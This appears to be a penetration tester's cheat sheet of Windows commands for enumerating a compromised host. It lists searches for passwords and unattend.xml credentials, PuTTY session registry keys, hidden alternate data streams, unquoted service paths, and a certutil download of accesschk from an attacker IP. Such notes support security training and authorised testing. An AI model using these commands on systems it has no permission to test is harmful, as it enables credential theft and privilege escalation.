dir

Gen­er­al:

• For all com­mands: Use /p to get a pause for large out­puts to scroll over!
• Use /a! Every­time! Use /a! Every­time! Use /a! Every­time! Use /a! Every­time! Use /a! Every­time! Use /a! Every­time! Use /a! Every­time! Use /a! Every­time! Use /a!

Usu­al commands:

• Search recur­sive:
  dir /s /a *.txt
• Show hid­den files:
  dir /ah
• Show sys­tem files:
  dir /as
• Show file own­er­ship infor­ma­tion
  dir /q
• Show … more?!
  dir -force
• Show also alter­nate data streams:
  dir /R
  • Read alter­na­tive data streams: If a file is list­ed like root.txt:root.txt:$DATA, then you can read the file with more (yes, on Win­dows):
    more < root.txt:root.txt:$DATA

There­fore: Remem­ber to use dir /R /as /ah -force.

tree

Start with cre­at­ing a list of all direc­to­ries and files. Down­load it. It’s way eas­i­er to look in a local edi­tor and it’s stored for the future as well.

tree c:\ > C:\Windows\Temp\dsys\dirs.txt
dir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt
(Download the files)

find (=grep)

Search for a string in an out­put, e.g. in a direc­to­ry listing:

dir | find "eyfile"

Search one string in a sin­gle files:

find "assword" $file

Search a string out of a set of strings in a sin­gle file (Note: find­str sup­ports regexp):

findstr "assword eyfile" $file

Grab line 101 from a large text file: Use find­str /n to out­put the textfile with line num­bers, then fil­ter for your number.

findstr /n $searchstring $file |find "101"

Find a string in a large file / out­put and get the lines around it:

type d.txt | findstr /n ^^ | findstr "Igor" // Search for a string to determine the line number.
type d.txt | findstr /n ^^ | findstr "^323" // Here, the string appears at line 32318. 323 shows 100 lines around.

wc (word cound)

There is no wc com­mand for Win­dows, but with the fol­low­ing, a line count can be displayed:

type $largefile | find /c /v ""

File system permissions

Check per­mis­sions with icacls:

icacls file.exe

Manual directory inspection

Now, check the fol­low­ing directories:

• C:\Users
• C:\Program Files [(x86)]
  • Cre­ate a list with each non-stan­dard program.
  • Search for exploits.
  • Search for sen­si­tive infor­ma­tions in 
    • the files with­in the pro­gram direc­to­ry
      findstr /spin "assword" .
    • the reg­istry (try to find the path(s) in the net)
      reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
  • Check if pro­gram files are write­able:
    certutil.exe -urlcache -split -f "http://$ownIP/accesschk.exe" accesschk.exe
accesschk.exe /accepteula -uws "Everyone" "C:\Program Files"
  • Check for unquot­ed ser­vice path. E.g. for C:\Program Files\app 2\app.exe:
    • C:\Program.exe
    • C:\Program Files\app.exe
• C:\Inetpub (or anoth­er serv­er directory)
• Pos­si­ble inter­est­ing files:
  %windir%\debug\NetSetup.log #AD domain name, DC name, internal IP, DA account
• Check dri­ves with wmic logicaldisk get caption || fsutil fsinfo drives and then D:\ E:\ .…
• Look into the trash:
  dir C:\$Recycle.Bin /s /b /R

Advanced

• Search for files with­in an inter­est­ing time win­dow:
  powershell.exe -ExecutionPolicy ByPass -command "& { Get-ChildItem -ErrorAction SilentlyContinue -Path c:\ -Recurse | Where-Object -FilterScript { $_.LastWriteTime -ge (Get-Date '16 Mar 2017 00:00') } | Where-Object -FilterScript { $_.LastWriteTime -lt (Get-Date '18 Mar 2017 00:00') } }"
• Find pass­word strings:
  findstr /si password *.*
• Find recent­ly changed files:
  Get-ChildItem -Path c:\ -Recurse | Where-Object -FilterScript { $_.LastWriteTime -ge (Get-Date).AddHours(-24) }
• Search for unattend.xml files / pro­vi­sion­al files. These files are often cre­at­ed by Win­dows for back­ground jobs and could con­tain cre­den­tials.
  dir -force /as /s *nattend.xml